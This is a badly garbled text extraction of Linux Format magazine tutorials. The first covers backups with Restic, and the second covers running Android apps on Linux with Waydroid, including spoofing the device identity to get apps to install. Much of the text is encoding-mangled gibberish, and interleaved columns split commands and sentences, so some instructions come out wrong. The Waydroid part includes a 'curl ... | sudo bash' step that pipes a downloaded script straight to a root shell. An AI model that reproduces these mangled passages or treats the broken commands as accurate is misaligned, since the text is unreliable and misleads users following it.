lawyering for robust cross-platform backup solution that Refer to the documentation to see how you can tweak the CPU usage
over 10. can help you create a local or remote copy of and compression when performing backups.
all your important files.
)1%,2$%01,/$"0- "&0+}1*2 %,# With each instance of a backup operation, Restic
consideration for most these days, your chosen backup creates a snapshot, which comprises the current state
0,)21&,+*20120"3&))"0- "4&0")6oRestic does of the specified files and directories. All subsequent
this with the use of deduplication, which ensures single backup operations are incremental, and you can also
 (2-0,#+6$&3"+#&)"o%&0*"+06,2/ (2-0 perform a diff operation to see the differences
1("2-)"000- "n4&1%1%"!!"!!3+1$"1%1&1}0 between the specified snapshots. Restic also encrypts
much easier and faster to find files in your backups. your backups by default, regardless of the destination,

REMOTE BACKUPS
,#/n4"}3",+)6!&0 200"!01,/&+$ ,**+!o #6,2}/"/2++&+$ "!,/n machine. You can do so with the sudo
 (2-0,+), )!/&3"oRestic, run sudo dnf install openssh-server restic init -r sftp:username@remote-
%,4"3"/n02--,/1001,/&+$ (2-0 openssh-client instead, followed by ip:<repo-path> command.
,+/"*,1"* %&+"020&+$ n&+ sudo systemctl enable sshd . , (2-1%"0*"/mnt/Stuffsies/
!!&1&,+1, ),2!01,/$"!"3& "0o Depending on the distro running on AA-Imp-Docs/ directory as from our
If you wish to store your backup on a 1%"/"*,1"* %&+"n6,2*6%3" -/"3&,20"5*-)",+1,1%"/"*,1"
/"*,1"* %&+"n6,2%3"1, ,+#&$2/" 1,!!&1&,+))6)),4&+ ,*&+$  host, we must now run restic backup -r
 ,+,1%6,2/%,01+!/"*,1" ,++" 1&,+0o,!,0,n/2+1%" firewall- sftp:[email protected]:backups /
machines. Ubuntu users can install cmd --permanent --zone=public --add- mnt/Stuffsies/AA\ Imp\ Docs .
OpenSSH with the sudo apt install service=ssh command. 00"+1&))6n6,2%3"1,/"-) "1%"
openssh-server openssh-client &1%6,2//"*,1"!"3& " ,+#&$2/"! <path> when specifying the location of
,**+!o"51n"+)"1%" 0"/3& " 1, "-1  ,++" 1&,+0n6,2*201 the repository with sftp:username@
with the sudo systemctl enable ssh first create a repository on the remote ip-address:<repository-path> .

56 LXF326 April 2025 www.linuxformat.com

 Terminal TUTORIALS

--help command for more specific help. You can see

some of the commonly used Restic commands below.
The ~ is not
Command Purpose expanded
/"1"+"4 (2-,#0-" &#&"!#&)"0 to /home/
backup user when
and directories
encountered
check %" (1%"/"-,0&1,/6#,/"//,/0 in the exclude
or include text
find Find a file or directory
files. When
mount ,2+11%"0-" &#&"!/"-,0&1,/6 defining files
or directories
Show the difference between in your home
diff
14,0+-0%,10 directory,
For each Restic command, the project offers comprehensive list &01)),'" 10&+/"-,0&1,/6 remember to
documentation and man page. specify the path
init Initialise a new repository with the $HOME
restore Extract files from a repository variable, or type
4%"1%"/), )01,/$"!"3& "n/"*,1"%,01,/
the complete
/"*,3)"01,/$"*"!&o +!!&1&,+1,1%"0"n6,2 "*,3"#&)"0,/!&/" 1,/6#/,* absolute path.
+)0,%,016,2/ (2-0,+ ),2!01,/$"0,)21&,+0 prune
/"-,0&1,/6
02 %0*7,+n ,,$)"),2!+!,1%"/0o
In addition to these, there are additional commands,
Getting Restic such as restic generate n4%& %4"}3"20"!)/"!6n+!
,2}))#&+!Restic in the software repositories of most restic self-update o%&0+&#16 ,**+! +"20"!1,
popular desktop distros, but the project also offers effortlessly update Restic; &#1%"/"}0+"4/")"0"n&1
-/" ,*-&)"!&+/&"0#,/&+25n&+!,40n,)/&0 2-!1"021,*1& ))64&1%,21*,/"20"/&+1"/3"+1&,+o
+!3/&,200601"*0o "!,3"/1,1%"")"0"0
0" 1&,+,+1%"-/,'" 1}0 &1 2-$"ƒhttps://github. Repositories and snapshots
com/restic/restic„+!!,4+),!1%")1"01#&)"o%"/" Restic uses repositories to store your backups. You
/"-)"+161, %,,0"#/,*01%"-/,'" 1-/,3&!"0 + /"1"0*+6/"-,0&1,/&"006,2)&("n02 %0
&+/&"0#,/3/&,20/ %&1" 12/"002 %0;:v&1+! ,+"#,/))6,2/3&!",0+!&*$"0n+,1%"/#,/4,/(
><v&1n04"))0o files, and yet another for personal files. Each repository
")"0"!2+!"/1%":v)20"& "+0"n+,1%"/ is secured with a password, and should you lose or
!3+1$",#Restic,3"/,1%"/ (2-0,)21&,+0&01%1 #,/$"11%"-004,/!n6,2 +}1 "001%"!1 ("!
&1!,"0+}1%3"+6!"-"+!"+ &"01,0-"(,#o,2 + up in the repository.
*,3"1%"&+/6&+1,!&/" 1,/6&+6,2/$PATH and A repository is essentially a directory, and you can
6,2}/"/"!61,20"1%"1,,)1,-"/#,/* (2-0o create a new directory with Restic, or use an existing
Unlike most projects that offer Gzip compressed directory as a repository. A repository contains a set
tarballs, Restic&+01"!-2)&0%"07&-: ,*-/"00"! ,#02!&/" 1,/&"0+!&0%,*"1,*"1!1n("60+!
files. Select the file you want and you can then ,1%"/-"/1&+"+1&+#,/*1&,+/")"3+11,1%"!16,2
uncompress it with the bunzip2 filename.bz2 wish to back up.
command. Next, rename the file and finally place it in Before you can back up your data, you must first
any directory in your $PATH. &+&1&)&0"/"-,0&1,/6o%&0&0!,+"4&1%1%" restic init
$ bunzip2 restic_0.17.3_linux_amd64.bz2 --repo <path-to-repository> command. For instance, If you have only
$ cp restic_0.17.3_linux_amd64.bz2 restic you can run the restic init --repo ~/Document/restic- one Restic backup
$ cp restic /usr/local/bin backup command to create a repository/directory repository, you
)1%,2$%&+01))&+$-/" ,*-&)"!&+/6$&3"0 named restic-backup in the ~/Documents directory: should consider
setting up an
6,21%")1"01/")"0"n!,&+$&11%&046*"+01%16,2 $ restic init --repo ~/Documents/restic-backup
alias to run
!,+}1$"1*+-$"01%16,2 +12/+1,0%,2)!6,2 enter password for new repository: the snapshots
need help with Restic. But fret not, the project offers a enter password again: command.
simple solution. Restic features a host of commands
02 %0$"+"/1"n ,-6n!&##n/" ,3"/n/"-&/+!0,,+o
2+ sudo restic generate --man /usr/share/man/man1/
to create the man pages for Restic in the specified
!&/" 1,/6o%&0 ,**+! /"1"0*+-$"0#,/))
Restic commands, such as restic backup , restic
recover , restic list and all others.
You can also use restic generate to create auto-
completion files for shells such as Bash, Fish and Zsh:
$ sudo restic generate --bash-completion /etc/bash_
completion.d/restic
[sudo] password for linuxlala:
writing bash completion file to /etc/bash_
completion.d/restic
You can run the restic --help command for a list of
))1%""01&  ,**+!0n+!1%" restic <command>

www.techradar.com/pro/linux April 2025 LXF326 57

TUTORIALS Terminal

[0:00] 0 index files loaded

MOUNTING REPOSITORIES Files: 53 new, 0 changed, 0 unmodified
Dirs: 10 new, 0 changed, 0 unmodified
While the restic ls command is useful, sometimes it makes sense to Added to the repository: 19.865 MiB (18.116 MiB stored)
3&"41%" ,+1"+10,#!&/" 1,/6#/,*1%" ,*#,/1,##&)"*+$"/o processed 53 files, 20.309 MiB in 0:02
You can easily mount Restic repositories just as you would mount a snapshot 00fbb5a9 saved
-/1&1&,+,/"51"/+)!/&3"o &/01n6,2*201 /"1"*,2+1-,&+1#,/ As this is the first instance of backing up, Restic
use with the Restic repository: sudo mkdir /mnt/restic-repo . informs us that it found no parent snapshot, and so
We can now mount our Restic repository in this mount point with 4&))/"!))#&)"0&+1%"0-" &#&"!!&/" 1,/6o"51nRestic
the restic -r <repo-path> mount <mount-point> command. &+#,/*0201%1&1#,2+!=;#&)"0+!98!&/" 1,/&"0o%"
$ restic -r ~/Documents/restic-backup/ mount /mnt/restic-repo/ project also compresses the data you wish to back up,
enter password for repository: 4%& %&0%,4"01& *+$"!1,01,/":8o;8A,#
repository c30fde85 opened (version 2, compression level auto) !1&+,219@o99>!&0(0- "o
[0:00] 100.00% 2 / 2 index files loaded ))0+-0%,10%3"1%"&/,4+2+&.2" n4%& %&0
Now serving the repository at /mnt/restic-repo/ used to identify the snapshots. When performing a
Use another terminal or tool to browse the contents of this folder. backup operation, Restic always creates a new
When finished, quit with Ctrl-c here or umount the mountpoint. 0+-0%,1n"3"+&#+,#&)",/!&/" 1,/6%0 %+$"!0&+ "
)1%,2$%&1}0-,00&)"1,!,0,n6,20%,2)!+}1)1"/1%" ,+1"+10 1%")01 (2-o,-/"3"+1 /"1&+$02 %0+-0%,10n
,#/"-,0&1,/6#1"/*,2+1&+$&1" 20"1%&0 +##" 11%"&+!"5 you can use the --skip-if-unchanged command flag.
created by Restic to keep track of the snapshots. When that In our example, we must run restic backup -r restic-
happens, Restic can no longer restore data from a repository. backup/ /mnt/Stuffsies/AA-Imp-Docs/ --skip-if-
%" restic check -r <repository>  ,**+! +"20"!1,3"/&#6 unchanged 1,-/"3"+1*(&+$2++" "00/60+-0%,10o
the health of repositories. If any errors are reported, you can run
restic -r <repository> repair index to correct the problems. Including and excluding files
A typical backup can contain files and directories
We’ve used #/,**2)1&-)"), 1&,+0o +# 1n,+ "6,2}3" /"1"!
the Ranger
file manager  (2-&+/"-,0&1,/6n6,2 +20"1%"0*"
to access the repository to back up other files and directories as well.
mounted Instead of manually adding all the files you wish
repository, 1, (2-4&1%Restic&++6$&3"+/"-,0&1,/6n6,2
but there are
+ /"1"1"51#&)"4&1%1%"-1%1,1%"!&/" 1,/&"0
several CLI file
managers and and files you wish to back up. Restic reads the
we’ve covered ,+1"+10,#1%&0#&)"+! (02-))*1 %&+$#&)"0
many in the +!!&/" 1,/&"0o"06*1 %&+$n" 20"6,2 +
pages of LXF 20"/"$2)/"5-/"00&,+04&1%&+1%"#&)"1,!"#&+"#&)"0
ìĆǏijéÐǎĥ­ĬijƧ
and directories you wish to back up.
,"$&+n /"1"1"51#&)"n4&1%*"+&+$#2)+*"
such as backup-these.txt. Each file and directory, or
pattern, must be listed in a new line within this file,
4%& %6,2 +"!&1&+6,2/#3,2/&1"1"51"!&1,/p
created restic repository c30fde8599 at /home/ $HOME/Documents/LXF*
linuxlala/Documents/restic-backup $HOME/Documents/MenschLaw/case-files/
Please note that knowledge of your password is We can now point Restic to this file with the restic
/".2&/"!1, "001%"/"-,0&1,/6o,0&+$6,2/ -r restic-backup --files-from ~/Documents/backup-
-004,/!*"+01%16,2/!1&0&//" ,3"/)6),01o these.txt command.
$ cd ~/Documents/restic-backup 1}0'2010"061,!"#&+"#&)"01%16,2!,+}14+1
$ ls 1, (2-4&1%Restic. For instance, you can choose to
config data index keys locks snapshots back up the entire contents of the ~/Documents
When creating a backup, in addition to the files and directory, but exclude all PDF files, or all files that
!&/" 1,/&"06,24&0%1,0#"$2/!n6,2%3"1,0-" &#6 match a defined pattern. Once again, create a text file
the repository you wish to use to store the backups. with a meaningful name, such as ignore-these.txt, and
%&0&0!,+"4&1%1%"-r flag. A snapshot is the current add all the files and directories or patterns you wish
state of files and directories you wish to back up. Restic to exclude when performing a backup.
3"/61&*"6,2/2+ (2-,-"/1&,+,+1%"0*" With our exclude text file in place, we can run the
repository, Restic creates a snapshot. All subsequent restic -r <repo> ~/Documents --exclude-file ignore-
backup operations are incremental, which means that these.txt command to back up the contents of the
only the modified files and directories are stored. Each ~/Documents directory except for all matches in
repository is thus home to a number of snapshots. 1%"ignore-these.txt file.
$ restic backup -r ~/Documents/restic-backup/ /mnt/ You can also use the --ignore command option
Stuffsies/AA-Imp-Docs/ 1,!&/" 1)60-" &#6#&)"0,/!&/" 1,/&"06,24+1Restic
enter password for repository: 1,&$+,/"o%" ,**+! restic -r <repo> ~/Documents
repository c30fde85 opened (version 2, compression --ignore <file1> --ignore <dir> --ignore *.txt ignores all
level auto) text files, as well as the specified file and directory in
created new cache in /home/linuxlala/.cache/restic the ~/Documents directory when performing the
no parent snapshot found, will read all files  (2-o%"--exclude-larger-than-size command

58 LXF326 April 2025 www.linuxformat.com

 Terminal TUTORIALS

option can similarly be used to ignore all files that are

larger than the specified file size.
%"--one-file-system command option is
particularly useful. It instructs Restic to only back up
#&)"0#/,*1%"-/"+1#&)"0601"*o,+0&!"/1%16,2
%3"-/1&1&,+0+!"51"/+)!/&3"0*,2+1"!
under /media. When you use Restic to back up /, using
the --one-file-system command option ensures that
*,2+1"!-/1&1&,+0+!!/&3"0/"&$+,/"!6Restic.

Managing snapshots
%" restic -r <repo-path> snapshots command lists all
1%"0+-0%,10&+1%"$&3"+/"-,0&1,/6o %0+-0%,1&0
assigned a unique ID, which can be used to perform
,-"/1&,+002 %03&"4&+$1%"!&##"/"+ ""14""+
14,0+-0%,10n,//" ,3"/&+$#&)"0#/,*0+-0%,1o
Restic)0,)"106,2!!1$01,0+-0%,10o%"0"
can also be used to define the snapshots for certain
,-"/1&,+0n02 %0/" ,3"/&+$#&)"0#/,*0+-0%,1,/
deleting a snapshot, instead of using the snapshot ID.
%" restic backup -r ~/Documents/restic-backup
--tag case-files ~/Documents/MenschLaw/case-files 1%1o" ,+!)6n4"}3"20"!1%" -n command flag, to You only have
command uses the tag case-files when creating the -"/#,/*!/6/2+o%"!/6/2+ +""5" 21"!4%"+ to initialise a
repository the first
snapshot. You can also add multiple tags to the same creating a backup as well to see what operations would time, and you can
0+-0%,1620&+$0"3"/)--tag command flags. be performed by Restic without actually making any then point Restic
Just as with directories on your system, you can use changes to a repository. to the repository
the ls ,**+!1,3&"41%" ,+1"+10,#0+-0%,1o ,03",+!&0(0- "n6,2 +/"*,3"0+-0%,10 with the -r
command option
2+ restic ls <snapshotID> for a complete list of all that are no longer needed. First, you must run the
in conjunction
#&)"0&+1%"0-" &#&"!!&/" 1,/6o+#,/12+1")6n6,2 +}1 restic -r <repository> forget <snapshot> command, with all Restic
use the --tag flag to identify the snapshot you wish to 4%& %!")"1"01%"0-" &#&"!0+-0%,1o%"!14&1%&+ commands.
access with the restic ls command. Use the --long 1%"0+-0%,1/"*&+02+##" 1"!n%,4"3"/n+!&001&))
command option with the restic ls command if 01,/"!&+1%"/"-,0&1,/6o,#/""2-!&0(0- "+!
6,2)0,4&0%1,3&"41%"0&7",#1%"#&)"0&+1%" ,*-)"1")6/"*,3"!1+,),+$"/00, &1"!4&1%
snapshot, as well as other details such as permissions, 0+-0%,1#/,*/"-,0&1,/6n6,2*201/2+1%" restic
modification time, file path and so on. By default, the -r <repository> prune command. You can combine the
restic ls command does not list the contents of two operations and instead run restic -r <repository>
subdirectories within the snapshot, and you must run forget <snapshot> --prune . Once again, if you used
restic ls <snapshotID> --long --recursive to do so. tags, they can be used to identify the snapshots you
#6,2&+!3"/1"+1)6 (2-#&)"01%16,24&0%1, wish to delete, instead of the snapshot ID.
/"*,3"#/,*0+-0%,1n6,2 +!,0,620&+$1%"
rewrite flag coupled with --exclude. For instance, to Restore files
/"*,3"))7&-#&)"0#/,*,2/case-files snapshot: You can restore the contents of an entire snapshot,
$ restic -r ~/Documents/restic-backup/ --tag case-files ,/ %"//6v-& (#&)"0&#6,2-/"#"/o,2+""!1,-/,3&!"
rewrite --exclude *.zip -n Restic with a destination target where the specified
enter password for repository: #&)",/1%" ,+1"+10,#0+-0%,10%,2)!"/"01,/"!o
repository c30fde85 opened (version 2, compression %" restic restore -r <repository> <snapshotID>
level auto) --target <some-directory> command places the
[0:00] 100.00% 2 / 2 index files loaded complete contents of the specified snapshot in the
snapshot 2a831284 of [~/Documents/MenschLaw/ target directory, while the following command only
case-files] at 2025-02-11 20:02:00.209161687 +0530 IST restores zip files from the specified snapshot:
by linuxlala@playground $ restic restore -r ~/Documents/restic-backup
excluding ~/Documents/MenschLaw/case-files/HC-9- 2a831284 --include *.zip --target /mnt/restic-restore
HPG-Consulting/New Documents.zip You can use multiple --include or --exclude
excluding ~/Documents/MenschLaw/case-files/HC-9- command flags to restrict the restoration operation.
HPG-Consulting/Project Deliverables.zip Just as we did when creating backups, text files with
excluding ~/Documents/MenschLaw/case-files/HC-9- patterns and file and directory names to include or
HPG-Consulting/documentsrequired.zip exclude can also be used when restoring files.
"/"n4"}3"20"!1%"--tag flag to identify "}3" ,3"/"!,+)61%"0& 0,#Restic, but this
1%"0+-0%,14"4&0%1,*,!&#6o #1%"/"4"/"+, 0%,2)!$&3"6,20,*"&!",#&10 -&)&1&"0o"#"/1,
00, &1"!1$0n4"4,2)!%3"%!1,#&/01/2+1%" 1%"!, 2*"+11&,+ƒhttps://restic.readthedocs.io) or
restic -r ~/Documents/restic-backup snapshots read the man pages to familiarise yourself with the
command to identify the snapshot ID and then use *+6!&##"/"+1 ,**+!,-1&,+03&))"o

ENHANCE YOUR TERMINAL-FU Subscribe now at http://bit.ly/LinuxFormat

www.techradar.com/pro/linux April 2025 LXF326 59

TUTORIALS Waydroid

WAYDROID
Credit: https://waydro.id

Run Android apps

on your Linux PC
Nick Peers discovers a fast and relatively easy way to run
standard Android apps on your Linux desktop installation.

ancy running Android

F --0,+6,2/!"0(1,-l
Then you need Waydroid.
Unlike other attempts to emulate
your mobile’s ecosystem, Waydroid
OUR installs Android in an LXC container,
giving it direct access to your
EXPERT system’s hardware. Waydroid also
Nick Peers integrates your new Android install
is looking directly into your desktop, making it
forward to possible to run mobile apps and
seeing how native programs side by side in
ǠǫɽࢳȥơˁǠˊŹɭǫƎ almost seamless fashion.
čŹʠȥʋʠࡹȥƎɭȶǫƎ Thanks to full hardware
installation acceleration, your choice of x86
performs over and ARM (via translation) apps and Waydroid currently emulates Android 11 by default – unofficial Android 13 builds exist,
the coming games run smoothly. You can also but for now Android 11 is the only ‘officially’ supported version.
months. set up file sharing to both access
and transfer files between Android and Linux. Better Android image. Waydroid ships with a minimal custom
still, Waydroid is relatively easy to set up and configure image based on LineageOS that provides Android 11.
– and armed with our tutorial, you’ll have all the tools You have a choice of two Android types: Vanilla, which
+!1&-06,2+""!1,/2+'201,21+6--,+6,2/o requires you to install a third-party app store to access
apps, or Gapps, which allows you to sign into your
Wailing about Wayland Google account and use the Play Store.
When running Waydroid, you need to be running a Once you’ve chosen, click Download and wait for
desktop environment that uses the Wayland display the image (around 900MB) to be downloaded. Click
server. Ubuntu has made Wayland its default since Done and Waydroid launches. By default, it opens in
Ubuntu 24.04 LTS, but open a terminal window, type full-screen view, which means your desktop appears to
echo $XDG_SESSION_TYPE and press Enter to be replaced by an Android desktop. Don’t worry, the
confirm it’s Wayland running. If you’re stuck with X11, Ubuntu dock and status bar remain visible, so you can
You can take all is not lost – visit https://github.com/1999AZZAR/ seamlessly move between Waydroid and native apps.
a local backup use-waydroid-on-x11 for detailed instructions. If you choose the GAPPS option expecting to
of your apps Installation is simple – most distros are covered at immediately have access to the Google Play Store,
and data using https://docs.waydro.id/usage/install-on-desktops, but you’ll be disappointed, but don’t worry – the Register
the built-in
Ubuntu users should issue the following commands: For Google Apps boxout (opposite) reveals the extra
Seedvault
backup provider
$ sudo apt install curl ca-certificates -y steps you need to follow to get things working.
– see https:// $ curl -s https://repo.waydro.id | sudo bash
docs.waydro. $ sudo apt install waydroid -y Basic navigation
id/faq/backup- Ignore the ERROR: Waydroid is not initialized, run The Android desktop works exactly as it would
restore-apps- “waydroid init” message; once complete, open the ,+6,2/-%,+",/1)"1n)1%,2$%&+01"!,#
and-data for program from its new shortcut on the app launcher. touchscreen, you’ll see a cursor, which works in
instructions "5 1)61%"466,2}!"5-" 1&11,x'201 )& (n!/$+!
ČĆǏķĬìĆäǎìijǎijČǎ Android activate! drop as you would normally. Waydroid also accepts
both back up The first thing you’re asked to do is initialise Waydroid. input from your keyboard, but the on-screen keyboard
and restore.
This involves downloading and installing your choice of automatically pops up as soon as you click inside an

60 LXF326 April 2025 www.linuxformat.com

 Waydroid TUTORIALS

REGISTER FOR GOOGLE APPS

If you install the Gapps version of Android or the Gapps add-on
#,/"06 "001, ,,$)")61,/"--0n6,2}))/2+&+1,%2/!)"p
message telling you that your device isn’t Play Protect certified, thus
making it impossible for you to use any Google services.
Thankfully, it’s a quick fix to register your instance of Waydroid as
a trusted device. First, open the terminal and enter the following:
$ sudo waydroid shell
Now issue the following command into the shell – you can copy
You can configure Waydroid to show apps in their own draggable and this command from https://docs.waydro.id/faq/google-play-
resizable windows – it’s a simple tweak with Waydroid Helper. certification to save time:
ANDROID_RUNTIME_ROOT=/apex/com.android.runtime
input field. Waydroid also defaults to the US English ANDROID_DATA=/data ANDROID_TZDATA_ROOT=/apex/com.
language and keyboard, which means that @ and “ android.tzdata ANDROID_I18N_ROOT=/apex/com.android.i18n
/"'251-,0"!o sqlite3 /data/data/com.google.android.gsf/databases/gservices.db
We can fix both problems at the same time. Swipe “select * from main where name = \”android_id\”;”
up from the bottom of the screen with the mouse to You’re shown a string of numbers next to android_id – copy this
reveal the apps list. Click Settings and navigate to 1,1%" )&-,/!n1%"+,-"+www.google.com/android/uncertified
System > Languages & Input. Start by clicking English &+6,2//,40"/o01"1%"+2*"/&+1,1%" ,,$)""/3& "0
(United States) to access the screen to add languages Framework Android ID box and click Register. Once you’ve passed
(search for English, then click United Kingdom). You the captcha check, your device is registered.
can then remove the unwanted US entry (click the The next thing to do is restart Waydroid. Sadly, this can’t be done
vertical dots and choose Remove, tick the US entry, from the main interface; instead, you need to open a terminal
1%"+ )& (1%"&+& ,+1,/"*,3"&1„o window and issue the following command:
Next, click the Physical Keyboard entry and flick the $ waydroid session stop
Use On-Screen Keyboard switch to off to hide it the Wait a few minutes for Google to process your registration, then
moment you start typing with your main keyboard. restart Waydroid from the app launcher – you should find the
Once done, click Wayland_Keyboard under Default and warning is gone and that you can now log into Google Play to
then click Set Up Keyboard Layouts in the pop-up. access apps and other services.
Scroll down to select English (UK), click Back, and the
keyboard now functions as expected.

Install apps
Those with Google Play set up can immediately use
the Play Store app to find and install apps on their
Waydroid instance. If you’ve installed the Vanilla build,
it’s possible to install apps through the terminal – you
need to manually download APK packages to a
suitable folder, such as Downloads, then issue the
following command:
$ sudo waydroid app install ~/Downloads/appname.
apk
Obviously, that’s fiddly, so why not make things Each virtual instance of Android you create needs to be registered in order
"0&"/,+6,2/0")#6&+01))&+$$/-%& )--01,/"l ijČǏ­ÆÆÐĬĬǎijéÐǎ7ČČäÿÐǎvÿ­őǎ}ijČĨÐƧ
The step-by-step guide (page 61) reveals how to
&+01))0 /&-11%1"+)"06,21,&+01))x*,+$,1%"/
things – F-Droid (https://f-droid.org) as well as MicroG different devices among other useful controls, tweaks
(https://microg.org), which basically gives you access and extensions. We’ll cover it shortly.
to the core Google apps if you need them. You should
also install Libhoudini, which provides ARM translation Manage apps
that allows you to run apps built for ARM-based Once installed, apps add shortcuts to the Android
devices (in other words, most mobile phones). desktop in the usual way. You can move these around
You should have little trouble installing most apps, the desktop like any regular Android install – click and
but you will come across occasions when apps claim hold on an icon and wait for it to be ‘picked up’, then
1,"&+ ,*-1&)"4&1%6,2/!"3& "o%"0,)21&,+%"/" drag it where you want to go. There are the pinned
is to spoof your device, so it claims to be something shortcuts at the bottom, and shortcuts can be kept on
else – we successfully employed this to install the *2)1&-)"!"0(1,-0ƒ'201 )& (+!04&-")"#1,//&$%14&1%
Royal Match game and Plex Dash app, among others. the mouse to move between screens).
The spoof-device.sh script at https://github.com/ You’ll also find that Waydroid has placed shortcuts
Quackdoc/waydroid-scripts/ can be used to trick to all your Android apps in the main Ubuntu launcher
--0&+1,1%&+(&+$6,2/6!/,&!&+01+ "&0 ,,$)" itself. Clicking one of these opens the app in its own
Pixel 5, but there’s an easier way to do this using a tool maximised window instead of displaying the whole
called Waydroid Helper, which can spoof a range of desktop environment. You can then close the app

www.techradar.com/pro/linux April 2025 LXF326 61

TUTORIALS Waydroid

simply by right-clicking its icon in the dock and applications) in your home folder – you can delete this
choosing Quit. on shutting down Waydroid to remove them.
Waydroid A word of warning: this approach can be glitchy. It’s a temporary fix; the shortcuts are recreated
periodically "#,2+!1%1,+,2/2+12:<o8<0601"*4&1%+ 1%"+"511&*"6,2)2+ %6!/,&!o #6,2}!)&("1,
releases new AMD CPU and GeForce graphics card, we often permanently disable them, open a terminal window
official builds brought Waydroid (and the current user session) while Waydroid is running and type the following:
based on the grinding to a halt when attempting to launch apps $ truncate -s 0 ~/.local/share/applications/
current version directly from these shortcuts. waydroid.*.desktop
of LineageOS %&0&0(+,4+&002",+1%"-/,'" 1}0 &1 2 This reduces the file size of each shortcut to 0
(18.1 at time of -$"0ƒ0"" https://github.com/waydroid/waydroid/ bytes, so the files remain in place, but do nothing – that
writing). These
issues/1404), and an early example of the fact that way, Waydroid doesn’t attempt to recreate them. The
are hosted at
https://ota.
6!/,&! +".2&1"1"*-"/*"+1)x&+ &!"+1))6n shortcuts vanish from the launcher and won’t return –
waydro.id/ 1%" &1 2&002"0-$"&0$,,!-) "1,01/14&1% should you ever need to recreate them, delete all the
and updates troubleshooting any other issues you encounter. Waydroid entries in .local/share/applications and
are delivered they’re recreated the next time you open Waydroid.
through Remove app icons
Waydroid itself. You may decide you don’t want these app shortcuts Easier to use
cluttering up your launcher, particularly if you install There are lots of tweaks you can apply to Waydroid,
lots of apps – they’ll get mixed up with your main but many require scripts or command-line knowledge.
Ubuntu apps, which can make things confusing. Why bother with that when there’s Waydroid Helper
%"0%,/1 210/"0&!"&+%&!!"+#,)!"/ƒ.local/share/ (https://github.com/ayasa520/waydroid-helper), a

EXPAND YOUR WAYDROID EXPERIENCE

Install dependencies Install script

1 The Waydroid Extras script enables you to install (and 2 Next you need to issue the following commands in
remove) a range of extras, such as Magisk (root access for 1%"1"/*&+)p
--0„nLibhoudini (ARM translation to improve app compatibility), $ git clone https://github.com/casualsnek/waydroid_script
Widevine (DRM for many streaming services) and more. First, $ cd waydroid_script
open the terminal to install the required prerequisites: $ python3 -m venv venv
$ sudo apt install git lzip python3.12-venv $ venv/bin/pip install -r requirements.txt

Run Waydroid Extras Install add-ons

3 Launch the interactive version of the script with: 4 Select Install on the next screen to reveal a list of apps:
$ sudo venv/bin/python3 main.py gapps, microg, libndk, magisk, smartdock, fdroidpriv, libhoudini
The terminal clears to a new screen. First, select which version and widevine. Select each one you wish to install in turn and press
,#+!/,&!6,2%3"&+01))"!ƒ+!/,&!99&+*,01 0"0„20&+$ Space to select them with a green radio button. When you’ve
1%" 2/0,/("60n1%"+-/"00+1"/o"51n %,,0" +01))1,0")" 1 completed your selection, press Enter to download and install the
items to add to your Waydroid setup. apps into your Waydroid installation.

62 LXF326 April 2025 www.linuxformat.com

 Waydroid TUTORIALS

on windowed mode for apps, they can only be dragged

around the portion of the screen given to the desktop.
Below these are two settings under Waydroid If Waydroid
Privileged Options. You can hide the Android navbar freezes before
from view using §, while the Device drop-down crashing you
provides an even more convenient way to spoof back to the login
different devices, with four alternatives on offer. screen, you’ll
The final section – Extensions – is similar to the find it’s still
running when
Install option under the Waydroid Extras script. There’s
you log back in.
some overlap, but while there are no third-party app
To resolve this,
stores here, there are several implementations of the open Waydroid
One of the many useful features offered by the Waydroid Helper app is Gapps store and ARM translations – note some require Helper, then
a means of spoofing your device to access more apps. Waydroid to be running Android 13. There’s also a stop the session
tweak to hide the status bar, gain root access and your before starting a
brilliant GUI front-end for controlling Waydroid’s choice of two Android launchers, which make it easier new one, which
"%&+!v1%"v0 "+"0#"12/"0l to find and launch apps from the Android desktop. will launch in
Installation on Ubuntu is simple via Waydroid’s repo: the background.
$ sudo add-apt-repository ppa:ichigo666/ppa Upgrade to Android 13 Choose Show
Full UI to bring it
$ sudo apt update Android 11 is getting on a bit, although Waydroid does
back into focus.
$ sudo apt install waydroid-helper still provide updates for its system image on a regular
Launch Waydroid Helper via its shortcut icon on the basis. Nevertheless, the community is keen for
launcher, and you’re greeted with a window showing Waydroid to adopt a more recent build, which is why a
1%/""10p ,*"n"11&+$0+!51"+0&,+0o quick web search reveals system images that run a
%" ,*"1 ,+1&+0'20114,0" 1&,+0p0"00&,+ later version of LineageOS on Android 13. Sadly, we
information display with power options, enabling you to couldn’t get any of these to work on our PC (Nvidia is
see if Waydroid is currently running. The power options notorious for causing problems with Waydroid).
make it easy to stop and start Waydroid, bring the If you’re willing to potentially bork your Waydroid
desktop into view if it’s hidden (Show Full UI), plus installation, you can try to upgrade yourself. Before
restart Waydroid to update any configuration changes. doing so, however, we recommend you a system
Below this is a Shared Folders section, which backup first (TimeShift worked well in our tests) .
simplifies the process of creating one or more shared Once backed up, head to https://github.com/
folders. You need to install bindfs ( sudo apt install gmankab/waydroid for one set of files and installation
bindfs ) for this to work. Once done, click + to select a instructions to try. Once done, you’ll soon find out if
folder to share. First, select the Source (the folder on Android 13 is in your future, but even if you manage to
your PC) you wish to share. If you select a preset get it successfully up and running, you may run into
option, such as Documents, you’ll see Waydroid prefills problems implementing scripts, tweaks and so on.
the Target directory, which points to the equivalent
directory in your Waydroid storage (for example,
~/.local/share/waydroid/data/media/0/Documents). TAP INTO THE COMMUNITY
#6,2*+2))6 %,,0"!&##"/"+1#,)!"/n6,2+""!1,
manually enter the target, too – browse to ~/.local/ Waydroid may be relatively simple to use, but that doesn’t mean it’s
share/waydroid/data/ to see what folders are available. intuitive. Quite a lot of behind-the-scenes actions require access to
the command prompt, which can be frustrating when you’re looking
Windowed mode at the Android desktop and wondering why you can’t use that.
Switch to the Settings tab to discover some useful Thankfully, there’s an army of enthusiasts labouring behind the
tweaks. The most useful is Persist.waydroid.multi_ scenes to make things as easy as possible, from online tips and
windows. Flick the switch on and click Reset to restart guides to apps (such as https://github.com/thomashastings/
Waydroid. When you next launch an app from its waydroid-companion) and scripts offering automated installs and
launcher shortcut, it opens in windowed mode. Many hacks, including the brilliant Waydroid Extras script as featured in
